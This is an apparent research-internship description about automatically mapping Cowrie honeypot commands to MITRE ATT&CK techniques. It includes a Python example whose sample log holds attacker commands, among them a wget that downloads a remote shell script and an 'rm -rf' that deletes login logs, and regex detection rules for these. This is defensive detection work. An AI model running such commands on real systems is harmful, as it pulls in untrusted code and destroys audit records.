Automating Attack Techniques to the MITRE ATT&CK Framework
Research Group Activity
In recent years threat intelligence frameworks such as MITRE ATT&CK have provided a common lexicon for the cybersecurity industry and have allowed the tactics and techniques employed by attackers to be classified and profiled effectively. However, profiling attackers and their techniques using the framework takes time because of the amount of data that needs to be sorted and inspected, even though the intelligence gained from doing so can prove invaluable to organizations deciding how to counter and respond to the threats they face. Honeypots, meanwhile, have long provided a means of observing and monitoring attackers, but without manual intervention the behaviours and techniques that could be harvested from attacker interactions go unscrutinised. Automation would reduce the huge amount of time an analyst needs to wade through captured data and would produce effective threat intelligence, especially when coupled with a knowledge base of adversarial techniques such as MITRE ATT&CK. The ability to automatically map attacker behaviours and techniques onto the common lexicon of the MITRE ATT&CK framework could provide organizations with a way to reduce the substantial resources needed to conduct threat intelligence.
Project Description
The project aims to address the following question: "Can honeypots be automated in a manner that allows the commands executed inside them to be automatically detected and attributed correctly to the MITRE ATT&CK Framework?"
The project will involve developing a framework, or further developing existing mechanisms, to automate the analysis of captured honeypot data so that it can be fingerprinted and mapped correctly to the MITRE ATT&CK framework. It will also involve establishing and assessing the accuracy of the collected fingerprints against the MITRE ATT&CK techniques.
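To make the mapping step concrete, the following is an added illustration (not code from the project or this page) of fingerprinting Cowrie command events and attributing them to ATT&CK technique ids. It assumes Cowrie's JSON log format for cowrie.command.input records, uses regular expressions as a stand-in for the YARA rules the project would write, and the log lines themselves are constructed samples.

```python
import json
import re
from collections import defaultdict

# Constructed Cowrie-style JSON log lines (the eventid/input/session fields follow
# Cowrie's cowrie.command.input records; commands, sessions and IPs are made up).
SAMPLE_LOG = """
{"eventid": "cowrie.command.input", "session": "a1b2c3", "src_ip": "192.0.2.10", "input": "uname -a; cat /proc/cpuinfo"}
{"eventid": "cowrie.login.success", "session": "a1b2c3", "src_ip": "192.0.2.10", "username": "root"}
{"eventid": "cowrie.command.input", "session": "a1b2c3", "src_ip": "192.0.2.10", "input": "wget http://198.51.100.7/x.sh -O /tmp/x.sh"}
{"eventid": "cowrie.command.input", "session": "a1b2c3", "src_ip": "192.0.2.10", "input": "rm -rf /var/log/wtmp"}
{"eventid": "cowrie.command.input", "session": "d4e5f6", "src_ip": "192.0.2.11", "input": "whoami"}
"""

# Fingerprint rules: regex stand-ins for YARA rules (an assumption of this example).
# Each maps a command pattern to a MITRE ATT&CK technique id and name.
FINGERPRINTS = [
    (r"\b(uname|cat\s+/proc/cpuinfo|lscpu)\b", "T1082", "System Information Discovery"),
    (r"\b(whoami|id)\b", "T1033", "System Owner/User Discovery"),
    (r"\b(wget|curl|tftp)\b", "T1105", "Ingress Tool Transfer"),
    (r"\brm\s+(-\w+\s+)*/var/log\S*", "T1070.004", "Indicator Removal: File Deletion"),
]


def fingerprint_command(command):
    """Return the (technique_id, name) pairs whose rule matches this command line."""
    return [(tid, name) for pattern, tid, name in FINGERPRINTS if re.search(pattern, command)]


def map_log_to_attack(log_text):
    """Parse Cowrie JSON lines and map each session to the techniques observed in it."""
    sessions = defaultdict(list)
    for line in log_text.strip().splitlines():
        event = json.loads(line)
        if event.get("eventid") != "cowrie.command.input":
            continue  # only shell input is fingerprinted; logins etc. are skipped
        for hit in fingerprint_command(event["input"]):
            if hit not in sessions[event["session"]]:
                sessions[event["session"]].append(hit)  # one entry per technique per session
    return dict(sessions)


if __name__ == "__main__":
    for session, techniques in map_log_to_attack(SAMPLE_LOG).items():
        print(session, [tid for tid, _ in techniques])
```

Assessing accuracy, as the project description asks, then amounts to comparing these per-session attributions against an analyst's labels for the same sessions.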
Required Skills
Understanding of the MITRE ATT&CK framework is desirable but not essential.
Experience in deploying and maintaining honeypots (Cowrie) is desirable but not essential.
Experience of using Docker is desirable but not essential.
Experience of coding in Python and using the YARA Python library is desirable but not essential.
Apply for this Project
If you wish to apply for this project, fill in the form below, uploading your CV and a personal statement explaining why you want to do this particular internship project. Attachments must be in PDF format.